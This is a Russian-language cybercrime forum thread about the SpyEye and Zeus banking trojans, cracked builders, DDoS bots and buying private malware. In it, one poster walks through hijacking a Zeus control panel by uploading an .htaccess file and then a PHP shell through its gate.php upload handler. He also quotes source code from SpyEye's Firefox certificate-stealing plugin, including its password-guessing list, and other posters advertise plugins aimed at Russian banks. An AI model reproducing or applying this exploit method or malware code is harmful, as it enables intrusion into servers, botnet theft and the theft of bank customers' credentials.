SpyEye

[KraZz]

Quake3 пишет:
Немного не по теме, но отпишусь.

Да вот поэтому и создал тему в оффтопе, чтобы не ограничиваться в высказываниях

Сегодня в одной теме на васме ziral2088 пост попался, а там подпись нарисовалась..

ziral2088 пишет:
KraZz: "Есть на васме некий чел с ником ziral2088 вот это, и есть aka gribodemon" -> bash.org

Открой личеко "красна девицца" - не стыдись© %)))

Чет напомнило мну одну тему на краблабе :P
Там в какой-то теме в оффтопе ара от болды пару строк в стихах написал про кравлера (эт такой "гений"), ну а толпа подхватила тему, и стих получил ЛОЛьное продолжение на несколько десятков постов, вот увидел эту подпись и подумал чет у нас здесь все слишком серьезно и написал начало (Сразу скажу я любитель только черного юмора, поэтому как-то так..)
Название
Анальный глаз.

"Аверы" быстро гробик сколотили
И на погост его отнесли
Клиенты в могилку крест забили
И из грибов венок сплели
 
По всем порталам новость раструбили
И счастью не было конца
Лишь некоторые скорбели:
- была потеряна их мечта!

Рыдали зомбики от счастья
Ведь нет теперь анального спая
...
...

Может у кого-нибудь муза проснется да напишет продолжение..

Quake3 пишет:
Во-первых, бот мне достался за небольшие деньги, около 100вмз.

Ну, эт какбэ не аргумент вообще – ИМХО
Возьмем, к примеру, эту тему:
http://xss.pro/index.php?topic=22020
там я писал

и читаем пару постов о боте
http://exelab.ru/f/index.php?action=vthrea...=15227&page=6#3

Wardrag пишет:
1. Необходимо подробное описание алгоритма работы данной программы(в пределах разумного)
2. Ничего не происходит визуально,но программа выполняется и некоторые системы частично нагружает.

Здесь ключевая фраза «системы частично нагружает»
Тебе в той теме масса народа писала (предупреждали, непонятно только на что ты надеялся), что там утечка памяти! (грузит систему)
Ты даже если криптанешь Darkness нормальным криптором (который держит 5k неделю), такого бота все равно спалит сам юзер (даже самый тупой – ИМХО) – конечно же, боты будут дохнуть как мухи, так ебать вешать систему
Поэтому криптор тут может быть вообще не причем..
Я так думаю тебе точно бесполезно что-то советовать, ты если вбил что-то себе в голову, то это уже надолго
тебе хоть тысячу железных фактов покажи.. ты все равно сделаешь, так как сам решил, взять тот же топик, в котором ты спрашивал про кодинг..

robert112 пишет:
хочу сказать пару слов в защиту спая.

Ну-ну. Чтобы защищать нужно, иметь хоть какой-то опыт, а не просто эмоции

robert112 пишет:
это покупка мечты.

Да никто у тебя мечту не пытаецца украсть
Мы чуть попозже вместе помечтаем, вот и посмотрим, как потом ты будешь "защищаться"
Там частично будут ответы на твой вопрос: (че за нах с плагинами спая)

robert112 пишет:
Плагины косячат?

Вот только у меня сомнения, что сможешь понять, о чем я напишу..
просто сейчас не хочется выкладывать интересную инфу
ЗЫ: Я потом несколько "статеек" выложу в поддержку второго этапа
ЗЫЫ: Вам понравицца, будите довольны©Путин

P. S.

Quake3 пишет:
Вот будучи полным нубом, без знаний к кодингу/реверсу и без доступа к преватам?

Когда-то давно бог мир создал, а каменщик его в течении многих веков достраивает
Так как же ты "проработав на стройке разнорабочим в течении месяца", таская только цемент и замешивая раствор, взяв в руки мастерок сможешь построить себе дом
Этому надо учиться в течении многих лет и "построить не один дом"
Можно конечно нанять приезжих, но тогда ты уже не будешь "первым после бога"
Или построив дом, надеясь на авось.. не будешь ли ты потом, заходя каждый раз в дом плеваться на него, от его ужасного вида
Покупая лицензионое ПО или юзая приватную прогу, ты не становишься от этого хакером, ты просто обычный юзер

Quake3 пишет:
KraZz , а как бы ты поступил на моем месте, если не секрет?

учиться, учиться и еще раз учиться... (и тут без вариантов)
ЗЫЫЫ: ИМХО

 

[robert112]

Вот тут на официальном форуме вмпрота админ пишет интересные вещи
http://anonym.to/?http://vmpsoft.com/forum...c.php?f=2&t=853

"And if you scroll down, you will see the typical VMP errors checks:" - крякер ошибочно думает, что сообщения типа "Can not find file...", "Can not read..." это сообщения защиты. На самом деле это код программы, который просто ничем не защищен. В результате имеем классический патч в виде безусловного перехода, который перепрыгивает все вызовы VMPrortectGetCurrentHWID и VMPrortectSetSerialNumber. Есть подозрение, что разработчик использовал в качестве защиты только одну упаковку и совершенно не позаботился о защите критичных участков своей программы (я даже не говорю про привязку кода к серийнику или хотябы минимальные проверки в виде VMProtectGetSerialNumberState) - поэтому имеем вот такой вот результат.

Либо грибодемон лоханутся и из всей функциональности VMprotect поюзал всего лишь упаковку, либо кряк на самом деле кривой патч.

2Krazz
по плагинам я уже понял, это из-за крякнутого билдера, там видимо защита не даёт плагинам работать.

 

[Apocalypse]

Ну в 1.3.45 билдере, там уже важные участки кода под ВМ, т.ч не все так плохо...

Лично у меня 1.3.45 работает нормально со всеми инжами и грабберами, до плагинов дело правда не дошло, но что-то я сомневаюсь, что работа плагинов описана в конфиге спая.

 

[Quake3]

KraZz

Я так думаю тебе точно бесполезно что-то советовать, ты если вбил что-то себе в голову, то это уже надолго
тебе хоть тысячу железных фактов покажи.. ты все равно сделаешь, так как сам решил, взять тот же топик, в котором ты спрашивал про кодинг..

Неправда, с чего это вы такое придумали. Как раз таки у меня нет еще своего мнения по многим вопросам, ибо я не разбираюсь в кодинге. И поэтому слушаю разные мнения со стороны. Та тема про кодинг, например - изначально я был настроен на php, но потом (по наводке DASM32) попробовал Perl, и понял, что LWP это шедевр. Если бы не спросил, так бы и сидел, как дурак, с сокетами кривым курлом.

А учиться - я учусь, упорно учусь, но увы, даже очень способный человек (а я явно ниже среднего) не может за несколько месяцев профессионально писать боты. Да тот же автор Оптимы - я думаю, он тоже читает кодинг форумы и книги, кодит уже несколько лет, но все равно его проект ругают.

Я вообще не фанат оптимы, и не надо писать, что я консерватор. Просто так вышло, что тогда иного не было, а очень хотел попробовать поддосить. Я сейчас ищу бот, присматриваюсь вот к Smoke ddos, аргументы в его пользу те, что там чистый ассемблер. Сам пробую писать, но вот идет туго. Пробовал разбираться с потоками, ушел целый день, и то, без помощи waahoo ничего бы не вышло. А для бота нужна грамотная многопоточность, иначе выйдет очередная оптима.

 

[KraZz]

Quake3 пишет:
Та тема про кодинг, например - изначально я был настроен на php, но потом (по наводке DASM32) попробовал Perl, и понял, что LWP это шедевр. Если бы не спросил, так бы и сидел, как дурак, с сокетами кривым курлом.

Ну и дальше-то что..

Quake3 пишет:
Интересно узнать по php - чем кто пользуется для написания такого вот сетевого софта? Просто мне лично ничего так и не подошло на 100%.

И дальше после этого стал продолжать на разных форумах задавать вопросы про php
Я "сужу" по твоим реальным действиям, а не по написанным буквам..

Quake3 пишет:
попробовал Perl

Попробовать мало, ты вот возьми да накодь на Perl`е что-нибудь полезное (ну что-то на подобное как из архива HTZ1.rar выложенного ниже..)
Мне почему-то кажется, что тебе сразу станет понятно при каких условиях нужно юзать тот или иной ЯП

Ты вот "пишешь, что хотел бы попасть в приват " (ну эт я так условно), а вот тебе пример:

Спойлер: 3

_http://demonteam.narod.ru/download/HTZ1.rar

ЗЫ: эта "уязвимость", на сколько я помню, была актуальна в 2009 году, многие за такой скриптег тогда готовы были отдать "приличные" жидошикеля %)))
Эта хактулуза написана на питоне (всего ~300 строк кода)
Так как же ты ("попав в приват"), сможешь ее заюзать, не зная питона? (вопрос чисто риторический)
Просто попасть в приват (тот приват, где действительно разработчики хаксофта общаются, а не просто банальные релизы с проверок выкладывают) - этого будет мало, нужно иметь хотя бы средний уровень знаний, причем, чем выше твой уровень знаний, тем больше шансов у тебя попасть в приват..

 

[Quake3]

Так выглядит, как будто я оправдываюсь, ну да ладно.
KraZz
1. PHP я все равно не бросил и не брошу. Хоть мне не нравится курл, но знать его на каком-то уровне нужно все равно. Если уж писать на заказ, то заказчикам чаще всего нужен именно пхп - т.к. на сервере чаще всего есть курл, но нет lwp.
Да и сам PHP удобней других языков для разработки сайтов, админок и так далее. Перл тут проигрывает. Зато для автоматизации действий Perl лучше, гораздо проще написать lwp->get("url"); чем функции на курле или сокетах.

2. Кроме того, изначально я был настроен на php еще по одной причине - мне чисто физически очень тяжело учить 3-4 языки сразу, + сопутствующие им детали (имею ввиду, протоколы, winapi, и так далее). Думал найти в пхп аналог lwp, но увы, не получилось.

3. Чтобы написать реально полезный софт, нужно выучить язык программирования на нормальном уровне. Я таким пока похвастаться не могу, ибо мало времени прошло + несколько языков сразу.

сможешь ее заюзать, не зная питона?

Ну запустить скрипт в интерпретаторе питона я думаю что смогу.. Не все же тру-хакеры знают абсолютно все ЯП (дельфи, Си, асм, перл, пхп). Да и, как я думаю, при разработке чего-либо надо ориентироваться как раз таки на людей, не знающих ЯП, а не только на кодеров.

Скажи честно, KraZz - через сколько времени изучения программирования ты написал что-нибудь годное? Имею ввиду изучение с абсолютного 0, а не как иногда пишут на форумах "я пхп изучил за неделю", но забывают добавить, что до этого "гений" три года кодил на Си.

 

[KraZz]

Quake3 пишет:
Так выглядит, как будто я оправдываюсь, ну да ладно.

Да нет, вот это:

Quake3 пишет:
1. PHP я все равно не бросил и не брошу. Хоть мне не нравится курл, но знать его на каком-то уровне нужно все равно. Если уж писать на заказ, то заказчикам чаще всего нужен именно пхп - т.к. на сервере чаще всего есть курл, но нет lwp.
Да и сам PHP удобней других языков для разработки сайтов, админок и так далее. Перл тут проигрывает. Зато для автоматизации действий Perl лучше, гораздо проще написать lwp->get("url"); чем функции на курле или сокетах.

2. Кроме того, изначально я был настроен на php еще по одной причине - мне чисто физически очень тяжело учить 3-4 языки сразу, + сопутствующие им детали (имею ввиду, протоколы, winapi, и так далее). Думал найти в пхп аналог lwp, но увы, не получилось.

3. Чтобы написать реально полезный софт, нужно выучить язык программирования на нормальном уровне. Я таким пока похвастаться не могу, ибо мало времени прошло + несколько языков сразу.

Как раз таки похоже на правду

Quake3 пишет:
Да и, как я думаю, при разработке чего-либо надо ориентироваться как раз таки на людей, не знающих ЯП, а не только на кодеров.

Ну, для этого специально и пишут подробную документацию как юзать, взять тот же FAQ от SpyEye, много бы там смогли бы наюзать владельцы ботнетов без него?, да они и при наличии FAQ`а вопросов массу имеют, а также есть всякие дополнительные сервисы, которые за дополнительное бабло помогают настроить ботнет.. и т.д. и т.п.

Quake3 пишет:
но забывают добавить, что до этого "гений" три года кодил на Си.

Гы-ы, зависть убогое чувство, тем более я лично не сомневаюсь что у тебя знаний по php больше чем у меня в 2-3 раза
Да и там ничего гениального нет, все просто как всегда, у тебя знаний запросто хватит (ИМХО), чтобы написать такой скрипт
Скрипт читает данные из полей, которые мы ввели в форму (на 1 и 2 рисунке), и создает пакет в нужном формате для гейта зевса v1.x.x.x
Далее отправляет эти данные через POST запрос
Короче скрипт по-сути, такой же как и плагин restclient для Firefox
http://releases.mozilla.org/pub/mozilla.org/addons/9780/
только не умеет создавать пакет в нужном формате..
Гейт зевса (для примера возьмем gate.php из zeus v1.3.2.1) получив этот запрос, расшифровывает полученные данные

//Получаем данные.
$data      = @file_get_contents('php://input');
$data_size = @strlen($data);
if($data_size < HEADER_SIZE + ITEM_HEADER_SIZE)die();
$data = RC4($data, BOTNET_CRYPTKEY);

//Верефикация. Если совпадает MD5, нет смысла проверять, что-то еще.
if(strcmp(md5(substr($data, HEADER_SIZE), true), substr($data, HEADER_MD5, 16)) !== 0)die();

//Парсим данные (Сжатие данных не поддерживается).
//Поздравляю мега хакеров, этот алгоритм позволит вам спокойно читать данные бота. Не забудьте написать 18 парсеров и 100 бэкдоров.
$list = array();
for($i = HEADER_SIZE; $i < $data_size;)
{
  $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
  $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
  $i += (ITEM_HEADER_SIZE + $k[3]);
}
unset($data);

//Основные параметры, которые должны быть всегда.
if(empty($list[SBCID_BOT_VERSION]) || empty($list[SBCID_BOT_ID]))die();

Из кода можно увидеть, как можно сформировать POST запрос, также как и понять, что здесь не нужны мега-знания - просто достаточно базовых знаний PHP
Далее скрипт проверяет значения полей SBCID_SCRIPT_ID SBCID_SCRIPT_STATUS SBCID_SCRIPT_RESULT

//Отчет об исполнении скрипта.
if(!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16)

Они у нас "пусты", и переходит к следующей проверке

else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
  $type = ToInt($list[SBCID_BOTLOG_TYPE]);
  
  if($type == BLT_FILE)
  {
    //Расширения, которые представляют возможность удаленного запуска.
    $bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');
    $fd_hash  = 0;
    $fd_size  = strlen($list[SBCID_BOTLOG]);
    
    //Формируем имя файла.
    if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();
    $file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
    $file_path = $file_root;
    $last_name = '';
    $l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
    foreach($l as &$k)
    {
      if(IsHackNameForPath($k))die();
      $file_path .= '/'.($last_name = urlencode($k));
    }
    if(strlen($last_name) === 0)$file_path .= '/unknown.dat';
    unset($l);

А вот эти поля (как видно из рисунков) SBCID_BOTLOG и SBCID_BOTLOG_TYPE у нас заполнены
Значение SBCID_BOTLOG_TYPE у нас равно 3, что соответствует BLT_FILE
Далее смотрим на его фильтр $bad_exts и видим, что в нем нет .htaccess
Вот его (.htaccess) мы и записываем в поле SBCID_PATH_DEST
пройдя через все фильтры, будет создан в директории ... файл .htaccess, а в этот файл будут записаны данные из поля SBCID_BOTLOG

if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();
        
flock($h, LOCK_EX);
fwrite($h, $list[SBCID_BOTLOG]);
flock($h, LOCK_UN);
fclose($h);

Далее после того как в директории ... появился файл .htaccess, мы отправляем второй POST запрос
Но уже немного другой
В поле SBCID_PATH_DEST мы пишем test.html (этого расширения также нет в фильтре $bad_exts)
Но нам уже .htaccess разрешает .html выполнить как php скрипт
В поле SBCID_BOTLOG мы пишем php-код, который позволит залить шелл, ну а далее угоняем половину ботов и не забываем удалять все файлы что заливали, чтобы не спалицца, потом через пару недель (если ботнет еще жив будет) можно будет зайти и еще ботов угнать (владелец ботнета все равно подумает что из-за крипта боты здохли), а как их угонять?.. но это уже совсем другая история©...
Тем, кому понравилось выше написанное, может себе купить дополнительно намного больше приватных знаний, исходников и скриптов
http://xss.pro/index.php?topic=2...39&#entry127439
ЗЫ: убейте в себе фатальную безграмотность

 

[robert112]

между делом, в приватах появились плагины спая для русских банков
bss, ibank и райффайзен.

искать: ib2.dll, bss.dll, raiff.dll

 

[KraZz]

robert112 пишет:
это покупка мечты.

Давай помечтаем немного вместе
Возьмем плагин ffcertgrabber.dll за $300 WMZ и представим, что мы его купили
А теперь давай немного разберем то, что мы "купили" (стало интересно? но одного интереса мало, для того чтобы понять как *бу* клиентов)
Посмотрим на код из этого плагина:

void ffcertgrabber()
{
  char profilePath[MAX_PATH] = {0};
  HMODULE hModule;
  LPSTR szFirefoxDir = GetFirefoxPath();
  if(szFirefoxDir)
  {
    if(LoadFirefoxDlls(szFirefoxDir))
    {
      if(HeapValidate(GetProcessHeap(), 0, szFirefoxDir))
      {
        HeapFree(GetProcessHeap(), 0, szFirefoxDir);
      }
      hModule = GetModuleHandleA("nss3.dll");
      if(hModule)
      {
        if(GetProcAddressNss3(hModule))
        {
          hModule = GetModuleHandleA("smime3.dll");
          if(hModule)
          [...]
        }
      }
    }
  }
}// end « ffcertgrabber »

Казалось бы, ну что здесь такого.. ну подумаешь, если LoadFirefoxDlls не загрузит какую-нибудь Dll (а она их в 90% не загружает), ну не удаляет он выделенную память функцией GetFirefoxPath, с кем не бывает
Но здесь за этим косячком может скрываться таже история, что и с Darkness – плагин (или армия плагинов) может постоянно жрать память и тем самым палить себя и спая
Теперь посмотрим на код функции GetFirefoxPath:

LPSTR GetFirefoxPath()
{
  char szProgramFilesPath[MAX_PATH];
  if(SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, 0, szProgramFilesPath))
  {
    return NULL;
  }
  LPSTR pBuffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH+1);
  if(!PathCombine(pBuffer, szProgramFilesPath, "Mozilla Firefox"))
  {
    if(!pBuffer)
    {
      return NULL;
    }
    if(HeapValidate(GetProcessHeap(), 0, pBuffer))
    {
      HeapFree(GetProcessHeap(), 0, pBuffer);
    }
    return NULL;
  }
  return pBuffer;
}// end « GetFirefoxPath »

Внимательно смотрим на это:

if(!PathCombine(pBuffer, szProgramFilesPath, "Mozilla Firefox"))

Из кода видно, что Dll будут загружаться из %ProgramFiles%\Mozilla Firefox
А вот по статистике на сто установленных Firefox меньше десятка имеют такой путь, отсюда возникает вопрос, а остальные 90% куда нах мимо проходят
Здесь дело в том, что у Firefox выходят постоянные релизы, и они имеют в основной своей массе пути типа:

C:\Users\[...]\AppData\Local\Yandex\Firefox\Application\firefox.exe
C:\Program Files (x86)\Aurora\firefox.exe
C:\Program Files\Mozilla Firefox 3.5 Beta 4\firefox.exe
и т.д.

%ProgramFiles%\Mozilla Firefox 3.5 Beta 4
Сталобыть серты с таких компов "украдены" не будут
Отсюда вывод, купив данный плагин, мы имеем не только утечку памяти, но и только 10-15% ffcertgrabber
Спрашивается нах платить за такое..
кто-то явно скажет: - да пох пусть хоть 10-15% будет
- да вот и не пох, у автора просто нет банальных знаний, чтобы хотя бы погуглить 5 минут и скопипастить паблик код, который будет иметь все 100%
Советую автору спая (бесплатно нах) установить какую-нибудь бетку Firefox, и посмотреть в реестр
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\
Параметр CurrentVersion (3.5b4 (ru))
И далее
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\3.5b4 (ru)\Main\
Параметр Install Directory (C:\Program Files\Mozilla Firefox 3.5 Beta 4)
Ну, чтобы уж еще до кучи для ЛОЛа (из этого же плагина)

BOOL CheckUserPassword()
{
  BOOL Status = SECSuccess;
  LPSTR pws[] = {
    "admin",
    "qwerty",
    "12345",
    "sex",
    "virus",
    "market",
    "zaza",
    "1234567890",
    "porn",
    "crazy",
    "business",
    "love",
    "money",
    "stealit",
    "secret",
    "qwertyuiop",
    "bugger",
    "hacker",
    "god",
    "hitler",
    "1488",
    "hunter",
    "shark",
    "bandit",
    "holly",
    "acab",
    "viking",
    "wease",
    "vodka",
    "usa",
    "bear",
    "hammerhead",
    "firefox",
    "gucci",
    "ferrari",
    "luxury",
    "casual",
    "anal",
    "punk",
    "black",
    "root",
    "111",
    "123",
    "1234",
    "asdf",
    "server",
    "asdfgh",
    "1",
    "blank",
    "!@#$",
    "!@#$%",
    "!@#$%^&",
    "sww",
    "wire",
    "cvv2",
    "gostev",
    "bmw",
    "bugatti",
    "ferrari",
    "stock",
    "porche",
    "mustang",
    "satan",
    "666",
    "z0mbie"
  };
  PK11SlotInfo *slot = PK11_GetInternalKeySlot();
  if(slot)
  {
    if(!(Status = PK11_CheckUserPassword(slot, "") == SECSuccess))
    {
      for(int i=0; 65 > i; i++)
      {
        
        if(Status = PK11_CheckUserPassword(slot, pws[i]) == SECSuccess)
        {
          break;
        }
      }
    }
    PK11_FreeSlot(slot);
  }
  return Status;
}// end « CheckUserPassword »

Много он так "набрутит"
ЗЫ: а ты говоришь

robert112 пишет:
не важно насколько он неграмотно написан

Представь, что ты купил спая, настроил свой ботнет - поливаешь его, пропалываешь и имеешь онлайн 2k ботов
Но в один прекрасный момент "заходишь в админку", а там, ни одного бота
И это тебе считай, повезло, тебя могли просто тупо доить как корову оставляя тебе крошки для того чтобы тебе хватало на поддержку ботнета, а ты так и будешь продолжать думать

robert112 пишет:
Есть четкие параметры отстук и палевность. Начал палится - криптуй, отстук хреновый - меняй криптора,

что это крипт плохой и поэтому боты умирают так быстро...
Нужно иметь хоть какую-то гарантию того что данный бот не имеет уязвимостей от УГОНА ИЛИ ВЗЛОМА
Когда ты юзаешь паблик (и имеешь маленький ботнет) – ты нах никому не нужен, как только покупаешь лицензию паблик бота %)))
Но на этом мечты еще не заканчиваются
Ты купил за 10k и счастлив, но вот через неделю кто-то берет и выкладывает в паблик, то что ты купил за 10k
Но у тебя, же есть лицензия, ура!
Только вот ты думаешь, что сейчас автор обновится и все будет гуд, но на самом деле там будут убогие фиксы (которые он откладывал на потом) багрепортов от клиентов которые, купив за 10k как и ты, только еще и ищут баги
Но, по сути, там будет изменена только версия и "усилена защита" вмпротом.. автор бота ведь знает что тебе

robert112 пишет:
не важно насколько он неграмотно написан

Нах там что-то кодить, ведь таких "непробиваемых" как ты у него вагон и большая тележка
Но и сейчас мы все еще мечтать продолжаем
ты же купил лицензию за 10k
вот только чисто риторический вопрос, а будешь ли ты застрахован после покупки лицензии от такого вот попадоса:
http://xss.pro/index.php?topic=20983

Бессмертный пишет:
Стоимость 6.5к
Работаем через гаранта данного форума , только через гаранта иначе никак ))
ICQ:649449275

Администрация , прошу удалить тему по причине того , что данное действие можно расценить как барыжничество . Приношу извинения за то что не ознакомился с правилами заранее .

По теме продаю клон билдера и клон системы к которой он привязан , автор зевса ушел из бизнеса и расценивать данное действие как барыжничество или нет - судить вам .

ЗЫЫ: ты думаешь, автор зевса просто так избавился от клиентской базы наработанной годами %))))

P. S.
Эт я так выше пофлудил чуть %)

 

[robert112]

KraZz, ты безусловно прав. Согласен с каждым пунктом, особенно ппц с брутом.

Но альтернативы нет)

Это как автоваз. Он годами выпускает говно, но люди покупаю, ругаются, но умудряются использовать. Зарабатывают, развлекаются, потом парятся в гараже с поломкой или едут в автосервис.

Хорошо тем кто сразу покупает Мерседес (приватный бот)

Лицензия зевс допиленного под p2p стоит 20к. Откуда у советского гражданина такие деньги? вот и покупают то что есть.

Сейчас вот еще карберп не кисло так в сми шумит, но в любом случае рынок пустой.


P.S. Можешь чуть пояснить что ты имел ввиду под "Нужно иметь хоть какую-то гарантию того что данный бот не имеет уязвимостей от УГОНА ИЛИ ВЗЛОМА"

В спае есть бэкдор, через который можно увести ботнет?

 

[accelerator]

В спае есть бэкдор, через который можно увести ботнет?

Скорее всего уязвимость. ))

 

[amok]

где почитать про нынешние возможности Спая?

 

[Apocalypse]

Формграб и инжект кода в страницы, руткит р3, ну и вроде чето он там пытаеться обойти =)